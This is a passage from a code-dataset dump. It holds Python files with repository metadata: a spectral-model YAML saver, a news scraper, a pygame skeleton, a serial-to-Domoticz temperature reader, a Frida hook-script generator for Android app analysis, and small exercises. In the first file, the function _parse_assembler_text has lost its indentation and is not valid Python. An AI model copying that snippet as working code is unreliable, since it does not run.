        # enforce correct suffix.
        if not fname.endswith(".yaml"):
            fname += ".yaml"
        # Context manager guarantees the handle is closed even if dump fails
        # (the previous open/close pair leaked the handle on errors).
        with open(fname, "w") as f:
            yaml.dump(out_model_dict, f, default_flow_style=False)
# Handles the case of a spectral model with a single component. It's
# not strictly a compound model, but saving and retrieving isolated
# components as if they were compound models makes for a simpler
# interface.
def _writeSingleComponentModel(model, model_directory, parent):
    """Save an isolated component using the same YAML layout as compound models."""
    name, serialized = _build_output_dict_single(model)
    _writeToFile({name: serialized}, model_directory, parent)
# Handles the case of a compound model
def _writeCompoundModel(compound_model, model_directory, parent, expression):
    """Save every component of a compound model plus its arithmetic expression."""
    out = {MODEL_NAME: {}}
    for component in compound_model:
        name, serialized = _build_output_dict_compound(component)
        out[MODEL_NAME][name] = serialized
    out[EXPRESSION_NAME] = expression
    _writeToFile(out, model_directory, parent)
def saveModelToFile(parent, model, model_directory, expression=None):
    """
    Saves spectral model to file.

    This is the main entry point for the 'save to file'
    functionality.

    Parameters
    ----------
    parent : QWidget or None
        optional widget used for screen centering.
    model : the (possibly compound) spectral model to save.
    model_directory : str
        directory offered as the default location in the save dialog.
    expression: str
        the formula associated with the compound model
    """
    # Compound models are detected by the presence of _format_expression.
    if not hasattr(model, '_format_expression'):
        _writeSingleComponentModel(model, model_directory, parent)
    else:
        _writeCompoundModel(model, model_directory, parent, expression)
#--------------------------------------------------------------------#
#
# Utility functions that might be used when we implement ties.
#
# Disassembles a tie callable. Ties read from a model
# file are not directly accessible in text form because
# the model file is compiled at import time.
def get_tie_text(tie):
    """Return source-like text for a tie callable, or 'False' when unset.

    Ties loaded from a compiled model file are not available as text, so the
    callable is disassembled and the lambda expression is reconstructed.
    """
    if not tie:
        return 'False'
    # dis() only outputs on standard output.....
    keep = sys.stdout
    sys.stdout = StringIO()
    try:
        dis.dis(tie)
        assembler_text = sys.stdout.getvalue()
    finally:
        # Always restore stdout, even when dis() raises (the previous
        # version left sys.stdout pointing at the closed StringIO).
        sys.stdout.close()
        sys.stdout = keep
    return _parse_assembler_text(assembler_text)
# This parses the text returned by the disassembler for
# a lambda function that multiplies a constant by a
# variable. That is, we are assuming that ties are coded
# as lambda functions with multiplication by a constant,
# as in the STSDAS' specfit task.
parser = re.compile(r'\(([^)]+)\)') # picks up whatever is enclosed in parenthesis
def _parse_assembler_text(text):
tokens = parser.findall(text)
factor = tokens[0]
lambda_variable_name = tokens[1]
function_id = tokens[2]
par_name = tokens[3]
return "lambda %s: %s * %s[%s].%s" % \
(lambda_variable_name,
factor,
lambda_variable_name,
function_id,
par_name)
| [
"nchlsearl@gmail.com"
] | nchlsearl@gmail.com |
a3bfa9e158ba5fe5b5a7697cfc74d1a729aefa2a | 65c616c59ae005debf91d82f4efc7f7cdcc2a7a4 | /news_recommendation/home/forms.py | a4274fbc39b814ece457b077eceefcf942431907 | [] | no_license | nghiatd16/most_cb | 28db8b0c52cc391f6890f2a56c8dee308a6dfc85 | 46d91016b20d57f3f43b63813f7fbccd5626a848 | refs/heads/master | 2022-12-25T17:33:04.896024 | 2020-09-19T08:34:15 | 2020-09-19T08:34:15 | 296,822,425 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 137 | py | from django.forms import ModelForm
import django.forms as forms
from django.conf import settings
import os
import glob
import shutil
| [
"nghiatd.proptit@gmail.com"
] | nghiatd.proptit@gmail.com |
8bc161a569ad8a54e4ac31af3570489611c0b553 | 2d6824fec53681a88d0566886b20895f5cbb1c89 | /article_scraping/article_scrapes/bdnews_scrape.py | da97d19e65635f0e570d04f36d01bbac89a466fe | [] | no_license | IRI-Bangladesh-Flood-Insurance-Research/bangladesh-nlp-flood-research | 715439d9115a7786cd8f6d3c41751b917bd401d2 | 8d69cbd3c5d56ac42e1b7473c70dfe9cddf2c735 | refs/heads/master | 2023-05-05T18:56:01.616917 | 2021-05-25T15:19:06 | 2021-05-25T15:19:06 | 289,547,572 | 1 | 5 | null | 2020-08-28T21:13:48 | 2020-08-22T18:48:00 | Jupyter Notebook | UTF-8 | Python | false | false | 1,103 | py | from unidecode import unidecode
from bs4 import BeautifulSoup
import requests
def bdnewsScrape(soup, meta):
    """Extract headline and body text from a parsed bdnews24.com article page.

    soup: BeautifulSoup document for the article page.
    meta: dict with at least a 'datePublished' string entry.
    Returns {'headline': str or None, 'text': date prefix + body text}.
    """
    headline, text = None, ''
    node = soup.find('h1', class_='print-only')
    if node:
        headline = node.text.strip()
    textmain = soup.find('div', class_='wrappingContent')
    # Guard: pages without the expected wrapper no longer raise AttributeError.
    textp = textmain.find_all('p') if textmain else []
    if textp:
        # Join paragraphs, skipping photo captions.
        text = ' '.join(p.text for p in textp if 'photo:' not in p.text.lower())
    # Normalise non-ASCII characters to their closest ASCII equivalents.
    if headline:
        headline = unidecode(headline)
    if text:
        text = unidecode(text)
    return {
        'headline': headline,
        'text': 'Date Published:{} \n'.format(meta['datePublished']) + text
    }
if __name__=='__main__':
    # Ad-hoc manual test against a live article URL (requires network access).
    site = 'https://bdnews24.com/bangladesh/2014/11/01/massive-blackout-brings-bangladesh-to-its-knees'
    meta = {'datePublished':'TRIAL'}
    page = requests.get(site)
    soup = BeautifulSoup(page.text, 'html.parser')
    print(bdnewsScrape(soup, meta))
| [
"tvp2107@columbia.edu"
] | tvp2107@columbia.edu |
10ca6b44c4aa6f1371af59bbb41cb3c72a722dc6 | 333b2e1284be6ea06a9989bcc76fd296f5c4f0a4 | /historicalVersion/MyLife v1.00.py | dcf7177fb0d0e7b798cf665981e4835db7c18d7a | [] | no_license | luomeng007/MyLife | 567df155a30857e2c5f03049611d83eb0a847c02 | 76447fdfeaa83d7b77964560d56c67ce2cd36905 | refs/heads/main | 2023-01-20T14:17:30.613718 | 2020-11-29T10:46:26 | 2020-11-29T10:46:26 | 309,741,680 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,948 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Nov 4 19:29:04 2020
@author: 15025
main program of game---My Life
"""
import pygame
import sys
version = 'v1.00'
class MainGame:
    """Owns the pygame window and runs the main event loop."""
    # the size of game window
    __SCREEN_WIDTH = 1000
    __SCREEN_HEIGHT = 800
    # Shared window surface, set once in __init__.
    window = None
    def __init__(self):
        # initialize modules of pygame
        pygame.init()
        # set window size of game
        MainGame.window = pygame.display.set_mode([MainGame.__SCREEN_WIDTH, MainGame.__SCREEN_HEIGHT])
        # set caption of window
        pygame.display.set_caption('My Life ' + version)
        # play background music
        self.playaBackgroundMusic()
    def mainGame(self):
        """Main loop: currently only services quit events."""
        # main loop of game
        while True:
            # wait for click game
            self.exitGame()
    @staticmethod
    # define a exit method of game
    def exitGame():
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
                sys.exit()
    @staticmethod
    def playaBackgroundMusic():
        # create Music instance
        # NOTE(review): hard-coded absolute Windows path — fails on any other
        # machine; consider a path relative to the game directory.
        m = Music(r"C:/Users/15025/Desktop/MyLife/musics/逍遥传说.mp3")
        # we need to give a parameter count here, but it has default value, so
        # we also could leave out it here
        m.playMusic()
class Music:
    """Thin wrapper around pygame.mixer.music for looping background audio."""
    def __init__(self, music):
        # use self.music store music we want to play
        self.music = music
        # this is not necessary, at the beginning we initialized all modules
        # pygame.mixer.init()
        # load music
        pygame.mixer.music.load(self.music)
    @staticmethod
    def playMusic(count=-1):
        # play background music in loop, for count = -1
        pygame.mixer.music.play(count)
# execute program (only when run as a script, not on import)
if __name__ == "__main__":
    # ML for My Life
    game_ML = MainGame()
    game_ML.mainGame()
| [
"noreply@github.com"
] | noreply@github.com |
4dfef08409cab37c02c98cb9113fdca1e36eeaa6 | 6ec817ef27a612209adebf927689073510c1c0ef | /podprojekty/czujnik temperatury na rfm12b/czujniki.py | a06f69646cddcdd2f2e409d730a5a07549f64547 | [] | no_license | uzi18/sterownik | eafa5caf317f48ad79735f8adf43618258f74aa0 | e53e18d75375e0db319ab2d5652ee19794328e5d | refs/heads/master | 2022-03-17T22:49:56.024308 | 2022-02-25T00:15:38 | 2022-02-25T00:15:38 | 24,689,808 | 24 | 15 | null | 2017-11-16T19:21:55 | 2014-10-01T18:19:52 | Python | UTF-8 | Python | false | false | 1,339 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import time
import serial
import sys
import sdnotify
if sys.version_info[0] == 3:
from urllib.request import urlopen
else:
from urllib2 import urlopen
# Fail fast with a descriptive error when the local config module is absent.
try:
    import konfiguracja
except ImportError:
    raise ImportError('brak pliku konfiguracji polaczenia ze sterownikiem: konfiguracja.py')
# Open the serial port the radio receiver is attached to.
rs = serial.Serial('/dev/ttyS0', 9600)

if 'ip_domoticz' in dir(konfiguracja) and 'port_domoticz' in dir(konfiguracja):
    domoticz = "http://"+konfiguracja.ip_domoticz+":"+str(konfiguracja.port_domoticz)+"/json.htm?type=command&param=udevice&idx="
    value = "&nvalue=0&svalue="
# NOTE(review): when the config lacks these attributes, `domoticz` and `value`
# stay undefined and the loop below raises NameError — confirm this is intended.

# Tell systemd we are up, then keep petting its watchdog from the loop.
n = sdnotify.SystemdNotifier()
n.notify("READY=1")

while 1:
    try:
        data = ''
        rs.flushInput()
        rs.flushOutput()
        # Keep reading until a complete "start:...:stop\r\n" frame arrives.
        while not (data.startswith("start:") and data.endswith("\r\n")):
            data = rs.readline()
        data = data.replace("\r\n", "")
        data = data.replace("start:", "")
        data = data.replace(":stop", "")
        data = data.split(":", 3)
        print(data)
        temp = data[1]
        temp = float(temp)/100    # hundredths of a degree -> degrees
        nodeid = data[0]          # sender node id (currently unused)
        tens = data[2]
        tens = float(tens)/1000   # millivolts -> volts (currently unused)
        # Push the temperature to the Domoticz device with idx 17.
        response = urlopen(domoticz + "17" + value + str(temp))
        n.notify("WATCHDOG=1")
    except Exception:
        # Best-effort loop: ignore malformed frames and network errors, but —
        # unlike the previous bare `except:` — let KeyboardInterrupt and
        # SystemExit propagate so the daemon can actually be stopped.
        pass
| [
"uzi18@o2.pl"
] | uzi18@o2.pl |
a4c1631df98fba75752807327669ecd1f9bef260 | 0f5d780a18d5d0937df02da9add0db73aa1c7158 | /dissector/frida/frida_writer.py | 54933ebce2e081edb39542afc20b01c281e4803e | [] | no_license | SergioLazaro/apkdissector | 13e86bea37b188ae94c182c5c534b6296f3a5939 | df1741632ab5395170e94ad9fb52a500cd5f0718 | refs/heads/master | 2021-01-12T19:23:13.525953 | 2016-12-26T11:11:23 | 2016-12-26T11:11:23 | 53,853,327 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,992 | py | __author__ = 'sergio'
class frida_writer:
    """Emits a Frida hook script (.js) and its Python loader (.py) for one class."""

    def __init__(self, filepath, classname):
        self.filepath = filepath
        self.classname = classname
        self.python_path = self.filepath + ".py"
        self.javascript_path = self.filepath + ".js"
        # The JavaScript hook file is opened for appending straight away.
        self.file = open(self.javascript_path, "a")

    def close_file(self):
        """Close whichever output file is currently open."""
        self.file.close()

    def write_frida_header(self):
        """Write the Java.perform() wrapper and the target-class lookup."""
        self.file.writelines([
            "Java.perform(function() {\n",
            "\t// Class to hook\n",
            "\tvar ThisActivity = Java.use('" + self.classname + "');\n",
        ])

    def write_frida_hook(self, method):
        """Append a hook stub for *method*; a None method is ignored."""
        if method is None:
            return
        self.file.writelines([
            "\tThisActivity." + method.methodname + ".implementation = function() {\n",
            "\t\tsend('hook - " + method.methodname + "')\n",
            "\t};\n",
        ])

    def write_frida_python(self, package_name):
        """Switch output to the .py loader and write the Frida boilerplate."""
        self.close_file()
        self.file = open(self.python_path, "w")
        loader_lines = [
            # Header
            'import frida, sys\n',
            'package_name = "' + package_name + '"\n',
            # Function get_messages_from_js
            'def get_messages_from_js(message, data):\n',
            '\tprint(message)\n',
            "\tprint(message['payload'])\n",
            # Function instrument_load_url
            "def instrument_load_url():\n",
            "\twith open('" + self.classname + ".js', 'r') as myfile:\n",
            "\t\thook_code = myfile.read()\n",
            "\treturn hook_code\n",
            # Bottom: attach over USB and load the script
            "process = frida.get_usb_device().attach(package_name)\n",
            "script = process.create_script(instrument_load_url())\n",
            "script.on('message',get_messages_from_js)\n",
            "script.load()\n",
            "sys.stdin.read()\n",
        ]
        self.file.writelines(loader_lines)
"sergiozgz1994@gmail.com"
] | sergiozgz1994@gmail.com |
f95d1e51671bce45841f7e3915d266738a858b88 | 1a96e184d7f1eb3deba0aac6b622625d7ec92ac7 | /Other labs/ОП/Lab02/Lab02.5.py | 09c73252043db58a74e92af5c957f7941f99ed7f | [] | no_license | SmokyTail/OldProjects | 30514000307295c28d2ae108e474e8c80460afdc | cc5dbab62f775c576ca620d4b3b662877c5d135e | refs/heads/main | 2023-08-31T06:29:08.139152 | 2021-10-19T11:20:41 | 2021-10-19T11:20:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 229 | py | is_equal = 0
# Demonstrates the boolean results of equality and chained comparisons.
x = 1
y = 2
z = 2
result = y == x
print(result)            # 2 == 1 -> False
result = z == y
print(result)            # 2 == 2 -> True
low = 1
mid = 2
high = 3
print(low < mid < high)      # 1 < 2 < 3   -> True
print(low > high < mid)      # 1 > 3 fails -> False
print(low < high <= mid)     # 3 <= 2 fails -> False
print(low >= mid < high)     # 1 >= 2 fails -> False
"Pasha-Love-comp@mail.ru"
] | Pasha-Love-comp@mail.ru |
c30e22ee2d9981b49022661bd8c8de23908ce27e | 78d7d7aeb78a8cea6d0e10b89fc4aa6c46c95227 | /448.py | d69d285b5d87d18b1e029474dd35d050e1364dcc | [] | no_license | GenryEden/kpolyakovName | 97db13ef93061a8c2afc6cc5acd91337f79063f1 | c5d7f631ae7ec8770e56170574b82ea2b7d8a4d9 | refs/heads/master | 2023-05-23T21:22:51.983756 | 2021-06-21T08:56:49 | 2021-06-21T08:56:49 | 350,466,773 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 139 | py | def f(x):
if x < 1:
return 0
elif x == 1:
return 1
else:
ans = f(x-1)
if x - 1 != 7:
ans += f(x-2)
return ans
print(f(12)) | [
"a926788@gmail.com"
] | a926788@gmail.com |
b027ecd4e3f1bf2b9f6306f3f245f5517fc82dcd | 4c267bf6ab68d38d65b32c7decd77f4d448d6554 | /Basic Algorithm Scripting Challenges/title-case-sentence.py | 76e664af1e4aa17e075369c3950df31c2e875cb6 | [] | no_license | danieltapp/fcc-python-solutions | 06199671d3e010c20e30d32bc998c5d2c0c6cbcf | a2b0c644d54688120ed3c7b05a2500d19b31b010 | refs/heads/master | 2020-03-17T21:35:50.504329 | 2018-05-23T18:28:24 | 2018-05-23T18:28:24 | 133,965,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 367 | py | import string
#Return the provided string with the first letter of each word capitalized. Make sure the rest of the word is in lower case.
def title_case(str):
    """Return *str* with each whitespace-separated word capitalized and
    the rest of each word lowered (the documented behavior of
    string.capwords with the default separator)."""
    return " ".join(word.capitalize() for word in str.split())
# Demo: run the converter over the FCC sample sentences.
for sample in ("I'm a little tea pot",
               'sHoRt AnD sToUt',
               'HERE IS MY HANDLE HERE IS MY SPOUT',
               'fart knocker'):
    print(title_case(sample))
| [
"danieltapp@gmail.com"
] | danieltapp@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.